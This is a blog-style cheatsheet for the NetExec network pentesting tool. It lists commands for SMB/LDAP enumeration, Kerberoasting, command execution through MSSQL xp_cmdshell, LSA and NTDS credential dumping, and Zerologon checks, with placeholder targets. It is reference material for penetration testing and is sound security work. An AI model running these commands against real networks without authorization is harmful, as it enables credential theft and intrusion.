Hacking Tools

NetExec Cheatsheet : A Comprehensive Guide

NetExec, also known as nxc, is a powerful network hacking tool designed to automate security assessments of large-scale networks.

It builds upon the legacy of CrackMapExec, offering enhanced functionality for penetration testers, red teamers, and cybersecurity professionals. Below is a detailed cheatsheet to help you utilize NetExec effectively.

To install NetExec:

bashsudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
netexec --version

The general syntax for NetExec commands:

bashnetexec <service> <target> -u <username> -p <password>

Example for SMB:

bashnetexec smb target -u username -p password
  • Null Authentication: netexec smb target -u '' -p ''
  • Guest Authentication: netexec smb target -u 'guest' -p ''
  • Kerberos Authentication: netexec smb target -u username -p password -k
  • Basic Enumeration: netexec smb target
  • List Shares: netexec smb target -u username -p password --shares
  • List Usernames: netexec smb target -u username -p password --users

Service-Specific Commands

SMB

  • All-in-One Enumeration: bashnetexec smb target -u username -p password --groups --users --shares --sessions
  • Extracting Files: bashnetexec smb target -u username -p password --get-file target_file output_file --share sharename

LDAP

  • User Enumeration: netexec ldap target -u '' -p '' --users
  • Kerberoasting: bashnetexec ldap target -u username -p password --kerberoasting hash.txt

MSSQL

  • Command Execution via xp_cmdshell: bashnetexec mssql target -u username -p password -x command_to_execute

FTP

  • List Files: netexec ftp target -u username -p password --ls

Credential Dumping

  • Secrets Dump: netexec smb target -u username -p password --lsa
  • NTDS Extraction: bashnetexec smb target -u username -p password --ntds

Check for vulnerabilities like Zerologon or PetitPotam:

bashnetexec smb target -u username -p password -M zerologon
  • Webdav Check: netexec smb target -u username -p password -M webdav
  • BloodHound Integration: bashnetexec ldap target -u username -p password --bloodhound

Explore the official NetExec Wiki and practice labs like HackTheBox’s Mist or Rebound to refine your skills.

This cheatsheet provides a quick reference to NetExec’s core functionalities, enabling efficient network enumeration, exploitation, and post-exploitation tasks.

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Recent Posts

How to Prevent Software Supply Chain Attacks

What is a Software Supply Chain Attack? A software supply chain attack occurs when a…

1 day ago

How UDP Works and Why It Is So Fast

When people ask how UDP works, the simplest answer is this: UDP sends data quickly…

2 weeks ago

How EDR Killers Bypass Security Tools

Endpoint Detection and Response (EDR) solutions have become a cornerstone of modern cybersecurity, designed to…

2 weeks ago

AI-Generated Malware Campaign Scales Threats Through Vibe Coding Techniques

A large-scale malware campaign leveraging AI-assisted development techniques has been uncovered, revealing how attackers are…

2 weeks ago

How Does a Firewall Work Step by Step

How Does a Firewall Work Step by Step? What Is a Firewall and How Does…

2 weeks ago

Fake VPN Download Trap Can Steal Your Work Login in Minutes

People trying to securely connect to work are being tricked into doing the exact opposite.…

2 weeks ago